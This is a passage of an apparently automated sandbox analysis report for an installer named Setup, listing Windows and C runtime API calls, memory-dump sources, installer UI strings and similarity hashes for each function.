  • Part of subcall function 698DF589: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 698DF5AC
  • Part of subcall function 698DF589: GetObjectW.GDI32(00000000,0000005C,?), ref: 698DF5B5
  • Part of subcall function 698DF589: CreateFontIndirectW.GDI32(?), ref: 698DF600
  • Part of subcall function 698DF589: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 698DF610
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000010), ref: 698F23BB
• SendMessageW.USER32(?,00000170,?,00000000), ref: 698F2408
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 698F243C
  • Part of subcall function 698EF933: SendMessageW.USER32(?,00000172,00000000,?), ref: 698EF944
• MapDialogRect.USER32(?,00000000), ref: 698F255F
• SendMessageW.USER32(?,00000030,?,00000001), ref: 698F25C4
• ShowWindow.USER32(?,00000001,?,00000000), ref: 698F25CF
  • Part of subcall function 698EF8DE: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,00000000,?), ref: 698EF91E
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: MessageSend$Window$CreateDialogImageLoadRectShow$FontH_prolog3IndirectObject
• String ID:
• API String ID: 727718542-0
• Opcode ID: ca590c9a1a237536e7b1430cfc8ce02fc32157be7cbc4c4ea929cdbeab5da6df
• Instruction ID: 944ca6caadab45c442264719584782c96cd1f4ceb49f481ae3bf7cdd98be87ea
• Opcode Fuzzy Hash: ca590c9a1a237536e7b1430cfc8ce02fc32157be7cbc4c4ea929cdbeab5da6df
• Instruction Fuzzy Hash: 58020275604341AFCB04DF68C888A1ABBF6FF89354F10896DF5868B361DB35D845CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698E21BF
  • Part of subcall function 698E1F81: __EH_prolog3.LIBCMT ref: 698E1F88
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
  • Part of subcall function 698DD76F: __EH_prolog3.LIBCMT ref: 698DD776
  • Part of subcall function 698DCA39: __EH_prolog3.LIBCMT ref: 698DCA40
  • Part of subcall function 698DCAC2: __EH_prolog3.LIBCMT ref: 698DCAC9
  • Part of subcall function 698DD170: __EH_prolog3.LIBCMT ref: 698DD177
• __CxxThrowException@8.LIBCMT ref: 698E2425
  • Part of subcall function 698FDBDB: RaiseException.KERNEL32(?,?,698F9236,?,?,?,?,?,698F9236,?,69907F54,699122B4), ref: 698FDC1D
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3$ExceptionException@8RaiseThrow
• String ID: Bitmap$Font$Icon$Text$UIInfo.xml$UiInfo element 'Static' should have one of Text, Icon or Bitmap elements!
• API String ID: 1412866469-225342085
• Opcode ID: f2c7a5ea108312a8a29d9078070dbcf20b48c641b37a13061aa68c0d2c3776e8
• Instruction ID: 78ce33d0947c175a46b04b49900924a619a73b6718398cfc7d422b2ca6714b9f
• Opcode Fuzzy Hash: f2c7a5ea108312a8a29d9078070dbcf20b48c641b37a13061aa68c0d2c3776e8
                                                                                                                                                                    • Instruction Fuzzy Hash: F8817F7590014CEFDB01DBECC944BDEB7B8AF1A318F248999E414EB291D734EA09DB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• CallNextHookEx.USER32(?,00000005,?,?), ref: 698DE9CF
• UnhookWindowsHookEx.USER32(?), ref: 698DE9FD
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Hook$CallNextUnhookWindows
• String ID:
• API String ID: 969045306-0
• Opcode ID: 313467c7b8d402ec0c87e5f1c79566ca6a0a22f466ae067d962a9516b2ca85a2
• Instruction ID: 50c3596e6cc015a48d261251a0d9f6a6fafd445356e045c13f6bb1cc5ca9df6a
• Opcode Fuzzy Hash: 313467c7b8d402ec0c87e5f1c79566ca6a0a22f466ae067d962a9516b2ca85a2
• Instruction Fuzzy Hash: 8F417E35A00A0AEFDB10DF19C888EA9B7B5FF11B59F10C919F4669B1A1D331EA48CF50
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698E48BD
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
  • Part of subcall function 698DD76F: __EH_prolog3.LIBCMT ref: 698DD776
  • Part of subcall function 698E1F81: __EH_prolog3.LIBCMT ref: 698E1F88
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: Drive1$Drive2$Drive3$Placement$Text
• API String ID: 431132790-3260609399
• Opcode ID: 5422fa26d39a610e905e4934e9bd49bf0dd8c2ecd2ee024dd266da83a580fa08
• Instruction ID: 73bd3dd9c6951e73b93e4e056c060e06c35d26d05af2b0c46a9992f722424cec
• Opcode Fuzzy Hash: 5422fa26d39a610e905e4934e9bd49bf0dd8c2ecd2ee024dd266da83a580fa08
• Instruction Fuzzy Hash: 18715D7190014CDFDB00DBECC854BEEBBB8AF29318F188998E115E7291DB349A09D761
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,009A6F08,00000008,009A3A86,00000000,00000000,?,009A2FA5,00000003), ref: 009A398A
• __lock.LIBCMT ref: 009A39BE
  • Part of subcall function 009A4331: __mtinitlocknum.LIBCMT ref: 009A4347
  • Part of subcall function 009A4331: __amsg_exit.LIBCMT ref: 009A4353
  • Part of subcall function 009A4331: EnterCriticalSection.KERNEL32(?,?,?,009A39C3,0000000D,?,009A2FA5,00000003), ref: 009A435B
• InterlockedIncrement.KERNEL32(009A8560), ref: 009A39CB
• __lock.LIBCMT ref: 009A39DF
• ___addlocaleref.LIBCMT ref: 009A39FD
Strings
Memory Dump Source
• Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
Similarity
• API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
• String ID: KERNEL32.DLL
• API String ID: 637971194-2576044830
• Opcode ID: 2238df4e014e12db94b3ec9bc929f40c53386eb90dd491141d6e4eca0a274c76
• Instruction ID: bb6e47d02e919033224a22e004709832e893f5080187ff941302d1d5a9532da2
• Opcode Fuzzy Hash: 2238df4e014e12db94b3ec9bc929f40c53386eb90dd491141d6e4eca0a274c76
• Instruction Fuzzy Hash: F7018075804B00DFDB209F69D90674AFBE0AF82325F10894EF4D6967E1CBB0A645CF90
Uniqueness

Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 699028B0
  • Part of subcall function 698F9BE0: __getptd_noexit.LIBCMT ref: 698F9BE3
  • Part of subcall function 698F9BE0: __amsg_exit.LIBCMT ref: 698F9BF0
• __getptd.LIBCMT ref: 699028C1
• __getptd.LIBCMT ref: 699028CF
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: MOC$RCC$csm
• API String ID: 803148776-2671469338
• Opcode ID: c95cb452513ca19a93679836afc226ef36163cfd16b51e0311ae908c2184dada
• Instruction ID: 5d5cd09c9c213d5d5d6ab09467cc7c9ae28702c40f9d6b4840edf010f75edab3
• Opcode Fuzzy Hash: c95cb452513ca19a93679836afc226ef36163cfd16b51e0311ae908c2184dada
• Instruction Fuzzy Hash: 6AE012381182048FD710DB68C0AA75C33D8BB44398F6568A9DC5CC7223C739E4928A52
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(kernel32.dll,?,009A2980), ref: 009A293F
• GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 009A2956
• GetProcAddress.KERNEL32(DecodePointer), ref: 009A2968
Strings
Memory Dump Source
• Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: DecodePointer$EncodePointer$kernel32.dll
• API String ID: 2238633743-1525541703
• Opcode ID: 6b711eff8519cf42c8341fe5ea15f0e73498b01dc0cd2a689ae93e0ee9d8bdab
• Instruction ID: 16bac240290b14f6519dd87045b8ae26aaf0866ea8a4e92c55eeebc00a8a91f9
• Opcode Fuzzy Hash: 6b711eff8519cf42c8341fe5ea15f0e73498b01dc0cd2a689ae93e0ee9d8bdab
• Instruction Fuzzy Hash: 2DE04275968224AACB14AFADBC09A863EE4FF877A5B004026B51497670D67C1480FFE0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698F4107
• SetWindowLongW.USER32(?,000000F4,0000006A), ref: 698F411B
  • Part of subcall function 698DFF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 698DFF21
• GetParent.USER32(?), ref: 698F4157
• SendMessageW.USER32(00000000,00000485,00000000,0000006A), ref: 698F4162
• GetParent.USER32(?), ref: 698F416F
• GetDesktopWindow.USER32 ref: 698F4174
  • Part of subcall function 698F8E26: HeapFree.KERNEL32(00000000,00000000,?,698F9BCC,00000000,?,698FB575,698F9054), ref: 698F8E3C
  • Part of subcall function 698F8E26: GetLastError.KERNEL32(00000000,?,698F9BCC,00000000,?,698FB575,698F9054), ref: 698F8E4E
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
• String ID:
• API String ID: 1093383602-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 009A5926
  • Part of subcall function 009A3AB0: __getptd_noexit.LIBCMT ref: 009A3AB3
  • Part of subcall function 009A3AB0: __amsg_exit.LIBCMT ref: 009A3AC0
• __amsg_exit.LIBCMT ref: 009A5946
• __lock.LIBCMT ref: 009A5956
• InterlockedDecrement.KERNEL32(?), ref: 009A5973
• _free.LIBCMT ref: 009A5986
• InterlockedIncrement.KERNEL32(00861070), ref: 009A599E
Memory Dump Source
• Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
• String ID:
• API String ID: 3470314060-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698E3971
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
  • Part of subcall function 698E3654: __EH_prolog3.LIBCMT ref: 698E365B
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: BackButton$CancelButton$FinishButton$NextButton
• API String ID: 431132790-22014311
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: StringVariant$AllocClearFreeH_prolog3Init
• String ID:
• API String ID: 1692324188-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetWindowTextW.USER32(?,?), ref: 698EC1C2
• GetDlgItem.USER32(?,00000065), ref: 698EC1CD
• SendMessageW.USER32(?,00000180,00000000,?), ref: 698EC1F7
• GetParent.USER32(?), ref: 698EC206
• RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,698EC10E,00000110), ref: 698EC22D
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: ExceptionItemMessageParentRaiseSendTextWindow
• String ID:
• API String ID: 3396959766-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 009A6243
  • Part of subcall function 009A6115: __FF_MSGBANNER.LIBCMT ref: 009A612E
  • Part of subcall function 009A6115: __NMSG_WRITE.LIBCMT ref: 009A6135
  • Part of subcall function 009A6115: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,009A4F49,?,00000001,?,?,009A42B7,00000018,009A6F78,0000000C,009A434C), ref: 009A615A
• _free.LIBCMT ref: 009A6256
Memory Dump Source
• Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
Similarity
• API ID: AllocateHeap_free_malloc
• String ID:
• API String ID: 1020059152-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 009A5676
  • Part of subcall function 009A3AB0: __getptd_noexit.LIBCMT ref: 009A3AB3
  • Part of subcall function 009A3AB0: __amsg_exit.LIBCMT ref: 009A3AC0
• __getptd.LIBCMT ref: 009A568D
• __amsg_exit.LIBCMT ref: 009A569B
• __lock.LIBCMT ref: 009A56AB
• __updatetlocinfoEx_nolock.LIBCMT ref: 009A56BF
Memory Dump Source
• Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: aa0135d19d26e32825474893915db441513358d86f2654390bd560fa9723144e
• Instruction ID: 0152ab94e06d4afde32af17be583a99320186f1ca19de73fdb7f51b64521b735
• Opcode Fuzzy Hash: aa0135d19d26e32825474893915db441513358d86f2654390bd560fa9723144e
• Instruction Fuzzy Hash: 3BF0B432B04B10DBDB20BB78980774E73A06F83724F668509F600AB2D2CF745A409AD6
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698F60AF
  • Part of subcall function 698F7341: __EH_prolog3.LIBCMT ref: 698F7348
  • Part of subcall function 698F7341: GetLastError.KERNEL32 ref: 698F7364
• RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 698F62D8
  • Part of subcall function 698EEB56: __wcsicoll.LIBCMT ref: 698EEB74
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3$ErrorExceptionLastRaise__wcsicoll
• String ID: Blocking Services$No Blocking Services
• API String ID: 1137283054-2473106011
• Opcode ID: eb4a44725c2f6ff84843c3906a01eb8e6991f46f542ccf0c0ce8710339ccc33d
• Instruction ID: 7a335342222e408a9d18b4ad3b82ae5dc23ed390d06412c71ed72b7c2e3b8f24
• Opcode Fuzzy Hash: eb4a44725c2f6ff84843c3906a01eb8e6991f46f542ccf0c0ce8710339ccc33d
• Instruction Fuzzy Hash: 5E915C74A0020EDFDF00CF68C985A9EB7B4FF14394F149A5CE855AB291D770EA56CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 009A29D4
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 009A29E0
Strings
Memory Dump Source
• Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: KERNEL32.DLL$SetProcessDEPPolicy
• API String ID: 1646373207-1809394400
• Opcode ID: 50bf2df8823834ad65794e711ae4942e0bd340badffb2bfa8bdcc530672259d4
• Instruction ID: 5c770149727efe0aaba820ab8e277f7f19bbb1c0e3b7fd4089a26d903dee9ad1
• Opcode Fuzzy Hash: 50bf2df8823834ad65794e711ae4942e0bd340badffb2bfa8bdcc530672259d4
• Instruction Fuzzy Hash: 59C08C74398324A7CB801BF40E0AB07321A6FC3F6BF000400F241E40A0DAA0848165E4
Uniqueness

Uniqueness Score: -1.00%

APIs
• MapDialogRect.USER32(?,00000000), ref: 698F01E4
  • Part of subcall function 698F91B7: _malloc.LIBCMT ref: 698F91D1
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 698F023D
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 698F0247
• ShowWindow.USER32(?,00000001,?,00000000,?,00000000), ref: 698F024E
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: MessageSend$DialogRectShowWindow_malloc
• String ID:
• API String ID: 929715566-0
• Opcode ID: 113d7af607e62867ba1558cbae1dcadd13eaccc665fb8d402e802d6439b15fb3
• Instruction ID: 3e209c83ec5a52908a294c35acf1367fb3a6c5eec4d5ae4f3fef0ce1343ac48a
• Opcode Fuzzy Hash: 113d7af607e62867ba1558cbae1dcadd13eaccc665fb8d402e802d6439b15fb3
• Instruction Fuzzy Hash: B3316935A00209AFCB15DF68C849AAEBBF5FF89350F208419F505EB3A0CB359A05CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698F1170
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
• GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 698F11B1
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3$DirectorySystem
• String ID: C:\
• API String ID: 105093994-3404278061
• Opcode ID: a135eacea4a1e40f75654ee13c944e3ffee49e5b2707c13fe2ed73cdf7f2777e
• Instruction ID: f41d86ad2fc2698f81812da02dd011e0895fb63033e4fc46c5138c0ae4e65521
• Opcode Fuzzy Hash: a135eacea4a1e40f75654ee13c944e3ffee49e5b2707c13fe2ed73cdf7f2777e
• Instruction Fuzzy Hash: 4C0186B5910129CFDF04DBA8CC54ABEB775FF15328F449918E521A72D0CB30AD06CB90
Uniqueness

Uniqueness Score: -1.00%